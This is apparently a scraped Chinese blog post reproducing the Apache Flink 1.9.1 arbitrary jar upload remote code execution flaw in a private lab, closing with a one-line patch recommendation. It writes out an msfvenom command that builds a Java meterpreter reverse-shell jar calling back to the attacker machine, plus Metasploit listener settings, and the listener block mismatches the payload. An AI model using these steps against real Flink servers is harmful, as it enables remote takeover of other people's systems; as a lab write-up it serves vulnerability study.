Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現

0x00簡介

Apache Flink是近幾年大火的數據處理引擎。受到各大廠商的推崇而且已經應用與實際的業務場景中。不少公司在進行選型的時候都會選擇Apache Flink做爲選型的對象。
Apache Flink能用來作什麼?
實時推薦系統
實時報表
實時數倉與ETL
復瑣事件處理
實時欺詐與實時信用評估
大數據安全監測
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
Flink核心是一個流式的數據流執行引擎,其針對數據流的分佈式計算提供了數據分佈、數據通訊以及容錯機制等功能。基於流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分佈式任務。java

0x01漏洞介紹

***者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的shell

0x02影響範圍

至目前Apache Flink 1.9.1版本apache

0x03環境搭建

***機kali:192.168.10.147
受害機Ubuntu:192.168.10.176
測試環境:Flink 1.9.1 java8+
Apache Flink 1.9.1安裝包下載:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下載完成後使用解壓
tar zxvf flink-1.9.1-bin-scala_2.11.tgz
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
進入bin目錄運行./start-cluster.sh啓動環境
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
環境搭建成功 目標站點 http://192.168.10.176:8081
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
0x04漏洞復現
1.使用kali生成jar後門包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
2.***機訪問目標站點 並上傳shell.jar
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
3.使用kali配置監聽
use exploit/multi/handler
set payload java/shell/reverse_tcp
set RHOST 192.168.10.147
set LPORT 2020
run
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
4.點開剛剛上傳的shell.jar,觸發漏洞
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
Apache Flink 任意 Jar 包上傳致 RCE 漏洞復現
0x05修復方式
更新官網補丁或更新最新版本安全

相關文章
相關標籤/搜索